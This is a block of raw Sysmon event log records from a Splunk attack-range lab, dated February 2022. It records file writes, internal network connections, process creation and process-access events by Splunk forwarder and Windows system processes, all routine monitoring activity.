Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55B47B4911C796B509FA7A17F20D3971,SHA256=AE9E4432406FCF60361598A854A3E7F6C062FA46D7E089A1F6BF820E341B6618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296909Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:40.623{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E97E6046B49B027AC8D237F794E0E982,SHA256=D1577A70A4867E079B035F12075298E0425438426D25A55EB28EF87E1814775B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296908Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:40.369{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220811Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:41.922{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8779C043B9E35D0B9A3EFF54468932B,SHA256=71C4F53C1FAD34451FAECF33C7FF61D3A66D4EC00B91F0889A138C30D8DB4360,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296913Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:41.906{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=511EAE257FDF855C580D20F919BC84F6,SHA256=98F06B76B073C82BE0FD3C2801A4F16E6D8841FB7CD061B3609DA28A6D0CB3C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296912Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:41.906{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8910FAC97214F7A508CA4C64DCD893A7,SHA256=74592FC0F5B15B1676B0D45F42BA862078FB068BE7353C7C5B1E431478CB5103,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296911Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:39.811{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49397-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000296910Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:41.638{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E1344600CF0818358F30577BBC3A764,SHA256=BA77DD2C5CF552CC60EE1657C9513D7C9EA3C8B38667295B84195FD3964E1D2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220810Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:38.654{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51610-false10.0.1.12-8000- 23542300x8000000000000000296914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:42.653{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55A67F09A6CB3F4CEE871205731501D3,SHA256=CD24DC5D6190CAD0485B944550303D7E6E73CE3883054E1EC4543918EE7F9C47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:43.654{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACFFFC152F1B2D779B55549578B446A5,SHA256=4B8130B0AC2A749428C5FC579200E058C0C8C2152A0BC2A76ED7193B1ED1FE15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220812Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:43.156{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D879DB9B75BEBF6CD9437EC48DA8E441,SHA256=E3EBF027FEF0BA7D680C7C03531E9A963B09E34AD45AA0870BDFBE8419713DCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:42.696{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49399-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:44.684{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEB2E6D9D866BC3BE934B9B75B57387C,SHA256=8970B64AA2A7B76FDD7013D998FE333F96F371468D6C9D6EC2D8672F6857CD9C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16E8-6216-FB04-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-16E8-6216-FB04-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.875{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16E8-6216-FB04-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.876{4F8D34B0-16E8-6216-FB04-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000220827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.675{4F8D34B0-16E8-6216-FA04-000000003902}10801040C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16E8-6216-FA04-000000003902}1080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:44.375{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 